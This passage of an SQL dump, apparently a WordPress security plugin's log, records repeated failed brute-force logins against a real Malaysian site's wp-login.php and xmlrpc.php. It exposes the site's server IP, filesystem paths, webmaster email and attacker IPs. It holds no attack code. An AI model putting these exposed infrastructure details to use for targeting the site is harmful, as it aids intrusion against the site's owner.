07:13:29',17740776,19231680,'https://bintara.com.my/wp-login.php',1,0,'103.74.121.142'),(23829,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.74.121.142\";s:11:\"REMOTE_PORT\";s:5:\"37959\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3km6PPIU0WjPk-sOuFiQAAAYI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568531611.8741\";s:12:\"REQUEST_TIME\";s:10:\"1568531611\";}}','notice','2019-09-15 07:13:33','2019-09-15 07:13:32',18257080,19554920,'https://bintara.com.my/xmlrpc.php',1,0,'103.74.121.142'),(23830,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"41868\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3nEuesTgPVjZVPWmsI@AAAAMs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568532242.8613\";s:12:\"REQUEST_TIME\";s:10:\"1568532242\";}}','notice','2019-09-15 07:24:04','2019-09-15 07:24:03',17743656,19228432,'https://bintara.com.my/wp-login.php',1,0,'104.131.58.179'),(23831,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"41868\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3nEuesTgPVjZVPWmsI@AAAAMs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568532242.8613\";s:12:\"REQUEST_TIME\";s:10:\"1568532242\";}}','notice','2019-09-15 07:24:04','2019-09-15 07:24:03',17906112,19228432,'https://bintara.com.my/wp-login.php',1,0,'104.131.58.179'),(23832,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"42386\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3nFaPPIU0WjPk-sOuGuQAAAYM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568532245.9897\";s:12:\"REQUEST_TIME\";s:10:\"1568532245\";}}','notice','2019-09-15 07:24:07','2019-09-15 07:24:06',18257136,19553952,'https://bintara.com.my/xmlrpc.php',1,0,'104.131.58.179'),(23833,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.191.173.134\";s:11:\"REMOTE_PORT\";s:5:\"57692\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3qH@esTgPVjZVPWmsJjwAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568533023.6452\";s:12:\"REQUEST_TIME\";s:10:\"1568533023\";}}','notice','2019-09-15 07:37:04','2019-09-15 07:37:03',17737552,19229072,'https://bintara.com.my/wp-login.php',1,0,'91.191.173.134'),(23834,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.191.173.134\";s:11:\"REMOTE_PORT\";s:5:\"32776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3qMaPPIU0WjPk-sOuIsgAAAYE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568533041.9334\";s:12:\"REQUEST_TIME\";s:10:\"1568533041\";}}','notice','2019-09-15 07:37:23','2019-09-15 07:37:22',18257696,19555800,'https://bintara.com.my/xmlrpc.php',1,0,'91.191.173.134'),(23835,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.78.134\";s:11:\"REMOTE_PORT\";s:5:\"41816\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3sXqPPIU0WjPk-sOuKPQAAAYc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568533598.1537\";s:12:\"REQUEST_TIME\";s:10:\"1568533598\";}}','notice','2019-09-15 07:46:39','2019-09-15 07:46:38',17738176,19229560,'https://bintara.com.my/wp-login.php',1,0,'104.248.78.134'),(23836,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.78.134\";s:11:\"REMOTE_PORT\";s:5:\"42240\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3sYOoTLkHKFi2qF7EYdwAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568533600.8068\";s:12:\"REQUEST_TIME\";s:10:\"1568533600\";}}','notice','2019-09-15 07:46:42','2019-09-15 07:46:41',18257696,19555800,'https://bintara.com.my/xmlrpc.php',1,0,'104.248.78.134'),(23837,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.32.126\";s:11:\"REMOTE_PORT\";s:5:\"57626\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX3vJqPPIU0WjPk-sOuMCwAAAZY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568534310.6093\";s:12:\"REQUEST_TIME\";s:10:\"1568534310\";}}','notice','2019-09-15 07:58:31','2019-09-15 